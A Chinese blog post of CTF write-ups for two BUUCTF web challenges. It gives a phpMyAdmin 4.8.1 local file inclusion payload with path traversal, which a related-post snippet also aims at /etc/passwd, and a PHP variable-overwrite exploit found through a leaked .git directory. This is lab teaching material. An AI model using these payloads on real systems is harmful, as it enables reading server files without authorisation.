BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1

最新推荐文章于 2024-06-17 17:20:41 发布
最新推荐文章于 2024-06-17 17:20:41 发布
阅读量584 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126963103
版权

[GWCTF 2019]我有一个数据库1

 启动靶机,发现并没什么有用信息,用dirsearch跑一下

爆破出了几个phpmyadmin目录下的几个文件

看一下第一个url 

可以看到版本是4.8.1,百度一下这个版本的通用漏洞,phpmyadmin 4.8.1 本地文件包含漏洞

既然可以文件包含,直接构造payload:

phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag

拿到flag         flag{603c33be-3f63-4868-97b3-f5468d21c535}  

[BJDCTF2020]Mark loves cat1

启动靶机,测试了几个功能点,没什么发现,先上工具跑吧

 虽然dirsearch只跑了百分之六,但是已经跑了好几个git目录下的文件了,猜测这道题关于git泄露的,所以直接换GitHack跑 (我爱脚本)

发现两个php文件,读源码

<?php
    include 'flag.php';

    $yds = "dog";
    $is = "cat";
    $handsome = 'yds';

    foreach($_POST as $x => $y){   
        $$x = $y;  //POST型声明至当前文件
    }

    foreach($_GET as $x => $y){
        $$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值   
    }

    foreach($_GET as $x => $y){
        if($_GET['flag'] === $x && $x !== 'flag'){ //如果GET型中flag变量的值等于GET型中一个不为flag的键名则退出
            
            exit($handsome); //exit显然能利用
        }
    }
    //如果GET型和POST型中都没有变量flag,则退出
    if(!isset($_GET['flag']) && !isset($_POST['flag'])){ 
        exit($yds);
    }

    if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
        exit($is);
    }

    echo "the flag is: ".$flag;

?>

 代码审计,需要传带flag的参数,尝试绕过第二个if语句

构造payload:

/index.php?yds=flag

 拿到flag (页面最下方)      ​​​​​flag{9a97bf85-5e8f-41c4-9a85-d1416d634378}

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_...对于数组中的每个元素,键名用于变量值
1SMB30CAT3G的技术参数
12-10
产品型号:1SMB30CAT3G峰值反向工作电压VRWM(V):30雪崩电压VBRmin(V):33.300IT(mA):1最大反向电压(钳位电压)Vc(V):48.400最大反向浪涌电流Ipp(A):12.400最大反向漏电流IR(uA):5芯片标识(MARK):MKC封装/温度(℃):SMB/-...
web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1872
ctf_BUUCTF_web
BUUCTF Web 第二页全部Write ups
yym68686
07-09 1287
目录[强网杯 2019]高明的黑客[BUUCTF 2018]Online Tool[RoarCTF 2019]Easy Java[GXYCTF2019]BabyUpload[GXYCTF2019]禁止套娃方法一方法二方法三[BJDCTF2020]The mystery of ip[GWCTF 2019]我有一个数据库[BJDCTF2020]Mark loves cat[BJDCTF2020]ZJCTF,不过如此[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[De1CTF 201
BUUCTF web writeup
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
BUUCTF解题十一道(04)
qq_45837896的博客
06-14 1306
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF,不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
BUUCTF刷题记录(第一页和第二页部分题)
weixin_51943950的博客
05-15 630
这个 晚上总算补完了所有的简易wp,二刷了一部分题目。 小白做题,大佬勿喷。。 [极客大挑战 2019]EasySQL 猜对用户名admin,判断密码框存在注入,直接万能密码,或者随意查询一下 [HCTF 2018]WarmUp 代码审计典型例题,两个if判断需要false,最后一个需要true,最后通过文件包含漏洞查看,还是较为简单的题目 [极客大挑战 2019]Havefun …就传个参 [ACTF2020 新生赛]Include 文件包含 伪协议 [强网杯 2019]随便注 本题
buuctf刷题之旅之web(二)
qq_50589021的博客
08-19 3149
2021-5-23 [BUUCTF 2018]Online Tool 题目: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GE
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 4万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
BUUCTF__web题解合集(二)
风过江南乱的博客
07-25 813
[GYCTF2020]Blacklist、 [SUCTF 2019]Pythonginx、 [BJDCTF2020]Mark loves cat、 [BJDCTF 2nd]old-hack、 [GWCTF 2019]我有一个数据库
BUUCTF(10.25-11.1)
qq_52988816的博客
11-23 3581
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
1SMB26CAT3G的技术参数
12-10
产品型号:1SMB26CAT3G峰值反向工作电压VRWM(V):26雪崩电压VBRmin(V):28.900IT(mA):1最大反向电压(钳位电压)Vc(V):42.100最大反向浪涌电流Ipp(A):9.500最大反向漏电流IR(uA):2.500芯片标识(MARK):SEC封装/温度(℃):...
1SMB36CAT3G的技术参数
12-10
产品型号:1SMB36CAT3G峰值反向工作电压VRWM(V):36雪崩电压VBRmin(V):40IT(mA):1最大反向电压(钳位电压)Vc(V):58.100最大反向浪涌电流Ipp(A):10.300最大反向漏电流IR(uA):5芯片标识(MARK):MPC封装/温度(℃):SMB/-65~...
1SMB28CAT3G的技术参数
12-10
产品型号:1SMB28CAT3G峰值反向工作电压VRWM(V):28雪崩电压VBRmin(V):31.100IT(mA):1最大反向电压(钳位电压)Vc(V):45.400最大反向浪涌电流Ipp(A):8.800最大反向漏电流IR(uA):2.500芯片标识(MARK):SGC封装/温度(℃):...
制作安全科普馆设计方案时,哪些安全细节不容忽视?
qq_2129354861的博客
06-12 346
在数字多媒体技术的浪潮下,创新的展示方式不仅引领了展厅设计的革新,还为知识内容的传递带来了前所未有的高效与便捷。不同类型的多媒体互动装置,让展厅的展示形式变得多样,我们为了确保展示内容更加明确和有条理,就需要对内容展示区域进行划分,而根据不同的安全主题,便是安全教育馆常用的方式之一,例如按照交通安全、消防安全、网络安全等类型的分类,可以将展示区域划分为不同的主题区域,再针对不同的内容版块,来选用适合的多媒体互动装置,使观众能够更快速地找到自己感兴趣的内容。
厨房燃气安全新保障:红外点式可燃气体报警器的作用
BDjiance的博客
06-13 537
与传统的可燃气体报警器相比,点式报警器具有更高的灵敏度和更快的响应速度。通过实时监测空气中的可燃气体浓度,并在发现异常时及时发出报警信号,它有效降低了燃气泄漏和火灾事故的发生概率。同时,红外技术的应用也使得报警器具有更高的检测精度和更快的响应速度,为家庭安全提供了更加可靠的保障。例如,在某小区的居民家中,由于燃气灶使用不当导致燃气泄漏,幸运的是,家中安装了红外可燃气体报警器。其中,燃气泄漏和火灾是厨房安全的主要隐患。近年来,红外可燃气体报警器因其独特的点式报警和红外技术优势,逐渐成为厨房安全的新守护。
AWS 批量添加安全
最新发布
大鹅的博客
06-17 251
bin/bash# 定义安全组ID-宁夏 VPC:NX-NHRY-PRD-VPC vpc-xxx# 从文件中读取IP地址到数组# 循环遍历内网 IP 列表。
揭秘网络安全攻防战
waitaikong_的博客
06-17 553
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
scanf("%f", &mark);
03-01
scanf("%f", &mark)是C语言中的一个输入函数,用于从标准输入(通常是键盘)读取一个浮点数,并将其存储到变量mark中。 具体解释如下: - scanf是C语言中的一个库函数,用于从标准输入读取数据。 - "%f"是格式控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值